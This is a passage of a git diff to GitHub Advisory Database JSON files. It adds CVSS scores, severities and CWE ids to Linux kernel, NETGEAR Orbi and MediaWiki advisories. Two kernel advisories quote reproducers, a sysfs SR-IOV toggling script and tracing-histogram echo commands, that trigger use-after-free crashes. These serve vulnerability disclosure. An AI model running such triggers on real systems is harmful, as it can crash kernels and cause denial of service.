a03049cbbf2e1..7dd667846dbff 100644 --- a/advisories/unreviewed/2025/10/GHSA-cf4p-6xcv-jcrj/GHSA-cf4p-6xcv-jcrj.json +++ b/advisories/unreviewed/2025/10/GHSA-cf4p-6xcv-jcrj/GHSA-cf4p-6xcv-jcrj.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-cf4p-6xcv-jcrj", - "modified": "2025-10-04T18:31:15Z", + "modified": "2026-02-12T18:30:18Z", "published": "2025-10-04T18:31:15Z", "aliases": [ "CVE-2023-53553" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: hyperv: avoid struct memcpy overrun warning\n\nA previous patch addressed the fortified memcpy warning for most\nbuilds, but I still see this one with gcc-9:\n\nIn file included from include/linux/string.h:254,\n from drivers/hid/hid-hyperv.c:8:\nIn function 'fortify_memcpy_chk',\n inlined from 'mousevsc_on_receive' at drivers/hid/hid-hyperv.c:272:3:\ninclude/linux/fortify-string.h:583:4: error: call to '__write_overflow_field' declared with attribute warning: detected write beyond size of field (1st parameter); maybe use struct_group()? [-Werror=attribute-warning]\n 583 | __write_overflow_field(p_size_field, size);\n | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nMy guess is that the WARN_ON() itself is what confuses gcc, so it no\nlonger sees that there is a correct range check. Rework the code in a\nway that helps readability and avoids the warning.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -25,7 +30,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-10-04T16:15:50Z" diff --git a/advisories/unreviewed/2025/10/GHSA-f95c-c99f-h2mq/GHSA-f95c-c99f-h2mq.json b/advisories/unreviewed/2025/10/GHSA-f95c-c99f-h2mq/GHSA-f95c-c99f-h2mq.json index 18a981eae3e5e..e91a37a504222 100644 --- a/advisories/unreviewed/2025/10/GHSA-f95c-c99f-h2mq/GHSA-f95c-c99f-h2mq.json +++ b/advisories/unreviewed/2025/10/GHSA-f95c-c99f-h2mq/GHSA-f95c-c99f-h2mq.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-f95c-c99f-h2mq", - "modified": "2025-10-04T18:31:15Z", + "modified": "2026-02-12T18:30:18Z", "published": "2025-10-04T18:31:15Z", "aliases": [ "CVE-2023-53556" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\niavf: Fix use-after-free in free_netdev\n\nWe do netif_napi_add() for all allocated q_vectors[], but potentially\ndo netif_napi_del() for part of them, then kfree q_vectors and leave\ninvalid pointers at dev->napi_list.\n\nReproducer:\n\n [root@host ~]# cat repro.sh\n #!/bin/bash\n\n pf_dbsf=\"0000:41:00.0\"\n vf0_dbsf=\"0000:41:02.0\"\n g_pids=()\n\n function do_set_numvf()\n {\n echo 2 >/sys/bus/pci/devices/${pf_dbsf}/sriov_numvfs\n sleep $((RANDOM%3+1))\n echo 0 >/sys/bus/pci/devices/${pf_dbsf}/sriov_numvfs\n sleep $((RANDOM%3+1))\n }\n\n function do_set_channel()\n {\n local nic=$(ls -1 --indicator-style=none /sys/bus/pci/devices/${vf0_dbsf}/net/)\n [ -z \"$nic\" ] && { sleep $((RANDOM%3)) ; return 1; }\n ifconfig $nic 192.168.18.5 netmask 255.255.255.0\n ifconfig $nic up\n ethtool -L $nic combined 1\n ethtool -L $nic combined 4\n sleep $((RANDOM%3))\n }\n\n function on_exit()\n {\n local pid\n for pid in \"${g_pids[@]}\"; do\n kill -0 \"$pid\" &>/dev/null && kill \"$pid\" &>/dev/null\n done\n g_pids=()\n }\n\n trap \"on_exit; exit\" EXIT\n\n while :; do do_set_numvf ; done &\n g_pids+=($!)\n while :; do do_set_channel ; done &\n g_pids+=($!)\n\n wait\n\nResult:\n\n[ 4093.900222] ==================================================================\n[ 4093.900230] BUG: KASAN: use-after-free in free_netdev+0x308/0x390\n[ 4093.900232] Read of size 8 at addr ffff88b4dc145640 by task repro.sh/6699\n[ 4093.900233]\n[ 4093.900236] CPU: 10 PID: 6699 Comm: repro.sh Kdump: loaded Tainted: G O --------- -t - 4.18.0 #1\n[ 4093.900238] Hardware name: Powerleader PR2008AL/H12DSi-N6, BIOS 2.0 04/09/2021\n[ 4093.900239] Call Trace:\n[ 4093.900244] dump_stack+0x71/0xab\n[ 4093.900249] print_address_description+0x6b/0x290\n[ 4093.900251] ? free_netdev+0x308/0x390\n[ 4093.900252] kasan_report+0x14a/0x2b0\n[ 4093.900254] free_netdev+0x308/0x390\n[ 4093.900261] iavf_remove+0x825/0xd20 [iavf]\n[ 4093.900265] pci_device_remove+0xa8/0x1f0\n[ 4093.900268] device_release_driver_internal+0x1c6/0x460\n[ 4093.900271] pci_stop_bus_device+0x101/0x150\n[ 4093.900273] pci_stop_and_remove_bus_device+0xe/0x20\n[ 4093.900275] pci_iov_remove_virtfn+0x187/0x420\n[ 4093.900277] ? pci_iov_add_virtfn+0xe10/0xe10\n[ 4093.900278] ? pci_get_subsys+0x90/0x90\n[ 4093.900280] sriov_disable+0xed/0x3e0\n[ 4093.900282] ? bus_find_device+0x12d/0x1a0\n[ 4093.900290] i40e_free_vfs+0x754/0x1210 [i40e]\n[ 4093.900298] ? i40e_reset_all_vfs+0x880/0x880 [i40e]\n[ 4093.900299] ? pci_get_device+0x7c/0x90\n[ 4093.900300] ? pci_get_subsys+0x90/0x90\n[ 4093.900306] ? pci_vfs_assigned.part.7+0x144/0x210\n[ 4093.900309] ? __mutex_lock_slowpath+0x10/0x10\n[ 4093.900315] i40e_pci_sriov_configure+0x1fa/0x2e0 [i40e]\n[ 4093.900318] sriov_numvfs_store+0x214/0x290\n[ 4093.900320] ? sriov_totalvfs_show+0x30/0x30\n[ 4093.900321] ? __mutex_lock_slowpath+0x10/0x10\n[ 4093.900323] ? __check_object_size+0x15a/0x350\n[ 4093.900326] kernfs_fop_write+0x280/0x3f0\n[ 4093.900329] vfs_write+0x145/0x440\n[ 4093.900330] ksys_write+0xab/0x160\n[ 4093.900332] ? __ia32_sys_read+0xb0/0xb0\n[ 4093.900334] ? fput_many+0x1a/0x120\n[ 4093.900335] ? filp_close+0xf0/0x130\n[ 4093.900338] do_syscall_64+0xa0/0x370\n[ 4093.900339] ? page_fault+0x8/0x30\n[ 4093.900341] entry_SYSCALL_64_after_hwframe+0x65/0xca\n[ 4093.900357] RIP: 0033:0x7f16ad4d22c0\n[ 4093.900359] Code: 73 01 c3 48 8b 0d d8 cb 2c 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d 89 24 2d 00 00 75 10 b8 01 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 fe dd 01 00 48 89 04 24\n[ 4093.900360] RSP: 002b:00007ffd6491b7f8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\n[ 4093.900362] RAX: ffffffffffffffda RBX: 0000000000000002 RCX: 00007f16ad4d22c0\n[ 4093.900363] RDX: 0000000000000002 RSI: 0000000001a41408 RDI: 0000000000000001\n[ 4093.900364] RBP: 0000000001a41408 R08: 00007f16ad7a1780 R09: 00007f16ae1f2700\n[ 4093.9003\n---truncated---", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -40,8 +45,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-10-04T16:15:50Z" diff --git a/advisories/unreviewed/2025/10/GHSA-g32r-xv9q-pp8r/GHSA-g32r-xv9q-pp8r.json b/advisories/unreviewed/2025/10/GHSA-g32r-xv9q-pp8r/GHSA-g32r-xv9q-pp8r.json index 2da746cf480ee..de3d711f792fe 100644 --- a/advisories/unreviewed/2025/10/GHSA-g32r-xv9q-pp8r/GHSA-g32r-xv9q-pp8r.json +++ b/advisories/unreviewed/2025/10/GHSA-g32r-xv9q-pp8r/GHSA-g32r-xv9q-pp8r.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-g32r-xv9q-pp8r", - "modified": "2025-10-04T18:31:15Z", + "modified": "2026-02-12T18:30:18Z", "published": "2025-10-04T18:31:15Z", "aliases": [ "CVE-2023-53560" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing/histograms: Add histograms to hist_vars if they have referenced variables\n\nHist triggers can have referenced variables without having direct\nvariables fields. This can be the case if referenced variables are added\nfor trigger actions. In this case the newly added references will not\nhave field variables. Not taking such referenced variables into\nconsideration can result in a bug where it would be possible to remove\nhist trigger with variables being refenced. This will result in a bug\nthat is easily reproducable like so\n\n$ cd /sys/kernel/tracing\n$ echo 'synthetic_sys_enter char[] comm; long id' >> synthetic_events\n$ echo 'hist:keys=common_pid.execname,id.syscall:vals=hitcount:comm=common_pid.execname' >> events/raw_syscalls/sys_enter/trigger\n$ echo 'hist:keys=common_pid.execname,id.syscall:onmatch(raw_syscalls.sys_enter).synthetic_sys_enter($comm, id)' >> events/raw_syscalls/sys_enter/trigger\n$ echo '!hist:keys=common_pid.execname,id.syscall:vals=hitcount:comm=common_pid.execname' >> events/raw_syscalls/sys_enter/trigger\n\n[ 100.263533] ==================================================================\n[ 100.264634] BUG: KASAN: slab-use-after-free in resolve_var_refs+0xc7/0x180\n[ 100.265520] Read of size 8 at addr ffff88810375d0f0 by task bash/439\n[ 100.266320]\n[ 100.266533] CPU: 2 PID: 439 Comm: bash Not tainted 6.5.0-rc1 #4\n[ 100.267277] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-20220807_005459-localhost 04/01/2014\n[ 100.268561] Call Trace:\n[ 100.268902] \n[ 100.269189] dump_stack_lvl+0x4c/0x70\n[ 100.269680] print_report+0xc5/0x600\n[ 100.270165] ? resolve_var_refs+0xc7/0x180\n[ 100.270697] ? kasan_complete_mode_report_info+0x80/0x1f0\n[ 100.271389] ? resolve_var_refs+0xc7/0x180\n[ 100.271913] kasan_report+0xbd/0x100\n[ 100.272380] ? resolve_var_refs+0xc7/0x180\n[ 100.272920] __asan_load8+0x71/0xa0\n[ 100.273377] resolve_var_refs+0xc7/0x180\n[ 100.273888] event_hist_trigger+0x749/0x860\n[ 100.274505] ? kasan_save_stack+0x2a/0x50\n[ 100.275024] ? kasan_set_track+0x29/0x40\n[ 100.275536] ? __pfx_event_hist_trigger+0x10/0x10\n[ 100.276138] ? ksys_write+0xd1/0x170\n[ 100.276607] ? do_syscall_64+0x3c/0x90\n[ 100.277099] ? entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n[ 100.277771] ? destroy_hist_data+0x446/0x470\n[ 100.278324] ? event_hist_trigger_parse+0xa6c/0x3860\n[ 100.278962] ? __pfx_event_hist_trigger_parse+0x10/0x10\n[ 100.279627] ? __kasan_check_write+0x18/0x20\n[ 100.280177] ? mutex_unlock+0x85/0xd0\n[ 100.280660] ? __pfx_mutex_unlock+0x10/0x10\n[ 100.281200] ? kfree+0x7b/0x120\n[ 100.281619] ? ____kasan_slab_free+0x15d/0x1d0\n[ 100.282197] ? event_trigger_write+0xac/0x100\n[ 100.282764] ? __kasan_slab_free+0x16/0x20\n[ 100.283293] ? __kmem_cache_free+0x153/0x2f0\n[ 100.283844] ? sched_mm_cid_remote_clear+0xb1/0x250\n[ 100.284550] ? __pfx_sched_mm_cid_remote_clear+0x10/0x10\n[ 100.285221] ? event_trigger_write+0xbc/0x100\n[ 100.285781] ? __kasan_check_read+0x15/0x20\n[ 100.286321] ? __bitmap_weight+0x66/0xa0\n[ 100.286833] ? _find_next_bit+0x46/0xe0\n[ 100.287334] ? task_mm_cid_work+0x37f/0x450\n[ 100.287872] event_triggers_call+0x84/0x150\n[ 100.288408] trace_event_buffer_commit+0x339/0x430\n[ 100.289073] ? ring_buffer_event_data+0x3f/0x60\n[ 100.292189] trace_event_raw_event_sys_enter+0x8b/0xe0\n[ 100.295434] syscall_trace_enter.constprop.0+0x18f/0x1b0\n[ 100.298653] syscall_enter_from_user_mode+0x32/0x40\n[ 100.301808] do_syscall_64+0x1a/0x90\n[ 100.304748] entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n[ 100.307775] RIP: 0033:0x7f686c75c1cb\n[ 100.310617] Code: 73 01 c3 48 8b 0d 65 3c 10 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa b8 21 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 35 3c 10 00 f7 d8 64 89 01 48\n[ 100.317847] RSP: 002b:00007ffc60137a38 EFLAGS: 00000246 ORIG_RAX: 0000000000000021\n[ 100.321200] RA\n---truncated---", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -44,8 +49,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-10-04T16:15:51Z" diff --git a/advisories/unreviewed/2025/10/GHSA-h7p3-q878-x2pj/GHSA-h7p3-q878-x2pj.json b/advisories/unreviewed/2025/10/GHSA-h7p3-q878-x2pj/GHSA-h7p3-q878-x2pj.json index 40ee0a889737d..d7a03501b8db3 100644 --- a/advisories/unreviewed/2025/10/GHSA-h7p3-q878-x2pj/GHSA-h7p3-q878-x2pj.json +++ b/advisories/unreviewed/2025/10/GHSA-h7p3-q878-x2pj/GHSA-h7p3-q878-x2pj.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-h7p3-q878-x2pj", - "modified": "2025-10-04T18:31:15Z", + "modified": "2026-02-12T18:30:18Z", "published": "2025-10-04T18:31:15Z", "aliases": [ "CVE-2023-53554" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: ks7010: potential buffer overflow in ks_wlan_set_encode_ext()\n\nThe \"exc->key_len\" is a u16 that comes from the user. If it's over\nIW_ENCODING_TOKEN_MAX (64) that could lead to memory corruption.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -48,8 +53,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-10-04T16:15:50Z" diff --git a/advisories/unreviewed/2025/10/GHSA-j4wq-v2m2-959h/GHSA-j4wq-v2m2-959h.json b/advisories/unreviewed/2025/10/GHSA-j4wq-v2m2-959h/GHSA-j4wq-v2m2-959h.json index 2dc859d44c726..509235f4bd117 100644 --- a/advisories/unreviewed/2025/10/GHSA-j4wq-v2m2-959h/GHSA-j4wq-v2m2-959h.json +++ b/advisories/unreviewed/2025/10/GHSA-j4wq-v2m2-959h/GHSA-j4wq-v2m2-959h.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-j4wq-v2m2-959h", - "modified": "2025-10-04T18:31:15Z", + "modified": "2026-02-12T18:30:18Z", "published": "2025-10-04T18:31:15Z", "aliases": [ "CVE-2023-53552" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915: mark requests for GuC virtual engines to avoid use-after-free\n\nReferences to i915_requests may be trapped by userspace inside a\nsync_file or dmabuf (dma-resv) and held indefinitely across different\nproceses. To counter-act the memory leaks, we try to not to keep\nreferences from the request past their completion.\nOn the other side on fence release we need to know if rq->engine\nis valid and points to hw engine (true for non-virtual requests).\nTo make it possible extra bit has been added to rq->execution_mask,\nfor marking virtual engines.\n\n(cherry picked from commit 280410677af763f3871b93e794a199cfcf6fb580)", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-10-04T16:15:50Z" diff --git a/advisories/unreviewed/2025/10/GHSA-jjx2-jhcm-j26c/GHSA-jjx2-jhcm-j26c.json b/advisories/unreviewed/2025/10/GHSA-jjx2-jhcm-j26c/GHSA-jjx2-jhcm-j26c.json index 38a7f9a1018fb..937c733e71e64 100644 --- a/advisories/unreviewed/2025/10/GHSA-jjx2-jhcm-j26c/GHSA-jjx2-jhcm-j26c.json +++ b/advisories/unreviewed/2025/10/GHSA-jjx2-jhcm-j26c/GHSA-jjx2-jhcm-j26c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-jjx2-jhcm-j26c", - "modified": "2025-10-04T18:31:15Z", + "modified": "2026-02-12T18:30:19Z", "published": "2025-10-04T18:31:15Z", "aliases": [ "CVE-2023-53563" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncpufreq: amd-pstate-ut: Fix kernel panic when loading the driver\n\nAfter loading the amd-pstate-ut driver, amd_pstate_ut_check_perf()\nand amd_pstate_ut_check_freq() use cpufreq_cpu_get() to get the policy\nof the CPU and mark it as busy.\n\nIn these functions, cpufreq_cpu_put() should be used to release the\npolicy, but it is not, so any other entity trying to access the policy\nis blocked indefinitely.\n\nOne such scenario is when amd_pstate mode is changed, leading to the\nfollowing splat:\n\n[ 1332.103727] INFO: task bash:2929 blocked for more than 120 seconds.\n[ 1332.110001] Not tainted 6.5.0-rc2-amd-pstate-ut #5\n[ 1332.115315] \"echo 0 > /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n[ 1332.123140] task:bash state:D stack:0 pid:2929 ppid:2873 flags:0x00004006\n[ 1332.123143] Call Trace:\n[ 1332.123145] \n[ 1332.123148] __schedule+0x3c1/0x16a0\n[ 1332.123154] ? _raw_read_lock_irqsave+0x2d/0x70\n[ 1332.123157] schedule+0x6f/0x110\n[ 1332.123160] schedule_timeout+0x14f/0x160\n[ 1332.123162] ? preempt_count_add+0x86/0xd0\n[ 1332.123165] __wait_for_common+0x92/0x190\n[ 1332.123168] ? __pfx_schedule_timeout+0x10/0x10\n[ 1332.123170] wait_for_completion+0x28/0x30\n[ 1332.123173] cpufreq_policy_put_kobj+0x4d/0x90\n[ 1332.123177] cpufreq_policy_free+0x157/0x1d0\n[ 1332.123178] ? preempt_count_add+0x58/0xd0\n[ 1332.123180] cpufreq_remove_dev+0xb6/0x100\n[ 1332.123182] subsys_interface_unregister+0x114/0x120\n[ 1332.123185] ? preempt_count_add+0x58/0xd0\n[ 1332.123187] ? __pfx_amd_pstate_change_driver_mode+0x10/0x10\n[ 1332.123190] cpufreq_unregister_driver+0x3b/0xd0\n[ 1332.123192] amd_pstate_change_driver_mode+0x1e/0x50\n[ 1332.123194] store_status+0xe9/0x180\n[ 1332.123197] dev_attr_store+0x1b/0x30\n[ 1332.123199] sysfs_kf_write+0x42/0x50\n[ 1332.123202] kernfs_fop_write_iter+0x143/0x1d0\n[ 1332.123204] vfs_write+0x2df/0x400\n[ 1332.123208] ksys_write+0x6b/0xf0\n[ 1332.123210] __x64_sys_write+0x1d/0x30\n[ 1332.123213] do_syscall_64+0x60/0x90\n[ 1332.123216] ? fpregs_assert_state_consistent+0x2e/0x50\n[ 1332.123219] ? exit_to_user_mode_prepare+0x49/0x1a0\n[ 1332.123223] ? irqentry_exit_to_user_mode+0xd/0x20\n[ 1332.123225] ? irqentry_exit+0x3f/0x50\n[ 1332.123226] ? exc_page_fault+0x8e/0x190\n[ 1332.123228] entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n[ 1332.123232] RIP: 0033:0x7fa74c514a37\n[ 1332.123234] RSP: 002b:00007ffe31dd0788 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\n[ 1332.123238] RAX: ffffffffffffffda RBX: 0000000000000008 RCX: 00007fa74c514a37\n[ 1332.123239] RDX: 0000000000000008 RSI: 000055e27c447aa0 RDI: 0000000000000001\n[ 1332.123241] RBP: 000055e27c447aa0 R08: 00007fa74c5d1460 R09: 000000007fffffff\n[ 1332.123242] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000008\n[ 1332.123244] R13: 00007fa74c61a780 R14: 00007fa74c616600 R15: 00007fa74c615a00\n[ 1332.123247] \n\nFix this by calling cpufreq_cpu_put() wherever necessary.\n\n[ rjw: Subject and changelog edits ]", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -33,7 +38,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-10-04T16:15:51Z" diff --git a/advisories/unreviewed/2025/10/GHSA-jrv8-9m22-559m/GHSA-jrv8-9m22-559m.json b/advisories/unreviewed/2025/10/GHSA-jrv8-9m22-559m/GHSA-jrv8-9m22-559m.json index 1560a85dfeba1..0b6e1850fabd9 100644 --- a/advisories/unreviewed/2025/10/GHSA-jrv8-9m22-559m/GHSA-jrv8-9m22-559m.json +++ b/advisories/unreviewed/2025/10/GHSA-jrv8-9m22-559m/GHSA-jrv8-9m22-559m.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-jrv8-9m22-559m", - "modified": "2025-10-04T18:31:15Z", + "modified": "2026-02-12T18:30:18Z", "published": "2025-10-04T18:31:15Z", "aliases": [ "CVE-2023-53562" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm: fix vram leak on bind errors\n\nMake sure to release the VRAM buffer also in a case a subcomponent fails\nto bind.\n\nPatchwork: https://patchwork.freedesktop.org/patch/525094/", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-401" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-10-04T16:15:51Z" diff --git a/advisories/unreviewed/2025/10/GHSA-m48w-fr7p-r6p2/GHSA-m48w-fr7p-r6p2.json b/advisories/unreviewed/2025/10/GHSA-m48w-fr7p-r6p2/GHSA-m48w-fr7p-r6p2.json index f1472cf3898a5..ff91bae7ef38f 100644 --- a/advisories/unreviewed/2025/10/GHSA-m48w-fr7p-r6p2/GHSA-m48w-fr7p-r6p2.json +++ b/advisories/unreviewed/2025/10/GHSA-m48w-fr7p-r6p2/GHSA-m48w-fr7p-r6p2.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-m48w-fr7p-r6p2", - "modified": "2025-10-04T18:31:15Z", + "modified": "2026-02-12T18:30:18Z", "published": "2025-10-04T18:31:14Z", "aliases": [ "CVE-2023-53550" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncpufreq: amd-pstate: fix global sysfs attribute type\n\nIn commit 3666062b87ec (\"cpufreq: amd-pstate: move to use bus_get_dev_root()\")\nthe \"amd_pstate\" attributes where moved from a dedicated kobject to the\ncpu root kobject.\n\nWhile the dedicated kobject expects to contain kobj_attributes the root\nkobject needs device_attributes.\n\nAs the changed arguments are not used by the callbacks it works most of\nthe time.\nHowever CFI will detect this issue:\n\n[ 4947.849350] CFI failure at dev_attr_show+0x24/0x60 (target: show_status+0x0/0x70; expected type: 0x8651b1de)\n...\n[ 4947.849409] Call Trace:\n[ 4947.849410] \n[ 4947.849411] ? __warn+0xcf/0x1c0\n[ 4947.849414] ? dev_attr_show+0x24/0x60\n[ 4947.849415] ? report_cfi_failure+0x4e/0x60\n[ 4947.849417] ? handle_cfi_failure+0x14c/0x1d0\n[ 4947.849419] ? __cfi_show_status+0x10/0x10\n[ 4947.849420] ? handle_bug+0x4f/0x90\n[ 4947.849421] ? exc_invalid_op+0x1a/0x60\n[ 4947.849422] ? asm_exc_invalid_op+0x1a/0x20\n[ 4947.849424] ? __cfi_show_status+0x10/0x10\n[ 4947.849425] ? dev_attr_show+0x24/0x60\n[ 4947.849426] sysfs_kf_seq_show+0xa6/0x110\n[ 4947.849433] seq_read_iter+0x16c/0x4b0\n[ 4947.849436] vfs_read+0x272/0x2d0\n[ 4947.849438] ksys_read+0x72/0xe0\n[ 4947.849439] do_syscall_64+0x76/0xb0\n[ 4947.849440] ? do_user_addr_fault+0x252/0x650\n[ 4947.849442] ? exc_page_fault+0x7a/0x1b0\n[ 4947.849443] entry_SYSCALL_64_after_hwframe+0x72/0xdc", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -25,7 +30,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-10-04T16:15:50Z" diff --git a/advisories/unreviewed/2025/10/GHSA-x2mg-85cj-xc8q/GHSA-x2mg-85cj-xc8q.json b/advisories/unreviewed/2025/10/GHSA-x2mg-85cj-xc8q/GHSA-x2mg-85cj-xc8q.json index b39632432c4ed..f9e5567100728 100644 --- a/advisories/unreviewed/2025/10/GHSA-x2mg-85cj-xc8q/GHSA-x2mg-85cj-xc8q.json +++ b/advisories/unreviewed/2025/10/GHSA-x2mg-85cj-xc8q/GHSA-x2mg-85cj-xc8q.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-x2mg-85cj-xc8q", - "modified": "2025-10-04T18:31:15Z", + "modified": "2026-02-12T18:30:18Z", "published": "2025-10-04T18:31:14Z", "aliases": [ "CVE-2023-53551" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: u_serial: Add null pointer check in gserial_resume\n\nConsider a case where gserial_disconnect has already cleared\ngser->ioport. And if a wakeup interrupt triggers afterwards,\ngserial_resume gets called, which will lead to accessing of\ngser->ioport and thus causing null pointer dereference.Add\na null pointer check to prevent this.\n\nAdded a static spinlock to prevent gser->ioport from becoming\nnull after the newly added check.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -36,8 +41,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-10-04T16:15:50Z" diff --git a/advisories/unreviewed/2026/01/GHSA-2cqm-696m-6jx3/GHSA-2cqm-696m-6jx3.json b/advisories/unreviewed/2026/01/GHSA-2cqm-696m-6jx3/GHSA-2cqm-696m-6jx3.json index 8c3d911ee0629..a27399994bbe8 100644 --- a/advisories/unreviewed/2026/01/GHSA-2cqm-696m-6jx3/GHSA-2cqm-696m-6jx3.json +++ b/advisories/unreviewed/2026/01/GHSA-2cqm-696m-6jx3/GHSA-2cqm-696m-6jx3.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2cqm-696m-6jx3", - "modified": "2026-01-13T18:31:07Z", + "modified": "2026-02-12T18:30:19Z", "published": "2026-01-13T18:31:07Z", "aliases": [ "CVE-2026-0405" ], "details": "An authentication bypass vulnerability in NETGEAR Orbi devices allows \nusers connected to the local network to access the router web interface \nas an admin.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:D/RE:M/U:Amber" diff --git a/advisories/unreviewed/2026/01/GHSA-972g-439m-qvrv/GHSA-972g-439m-qvrv.json b/advisories/unreviewed/2026/01/GHSA-972g-439m-qvrv/GHSA-972g-439m-qvrv.json index 1f80f71f36efc..37eb9831f4037 100644 --- a/advisories/unreviewed/2026/01/GHSA-972g-439m-qvrv/GHSA-972g-439m-qvrv.json +++ b/advisories/unreviewed/2026/01/GHSA-972g-439m-qvrv/GHSA-972g-439m-qvrv.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-972g-439m-qvrv", - "modified": "2026-01-09T00:30:28Z", + "modified": "2026-02-12T18:30:19Z", "published": "2026-01-09T00:30:28Z", "aliases": [ "CVE-2026-22713" ], "details": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in The Wikimedia Foundation Mediawiki - GrowthExperiments Extension allows Cross-Site Scripting (XSS).This issue affects Mediawiki - GrowthExperiments Extension: 1.45, 1.44, 1.43, 1.39.", "severity": [ + { + "type": "CVSS_V3", + "score": 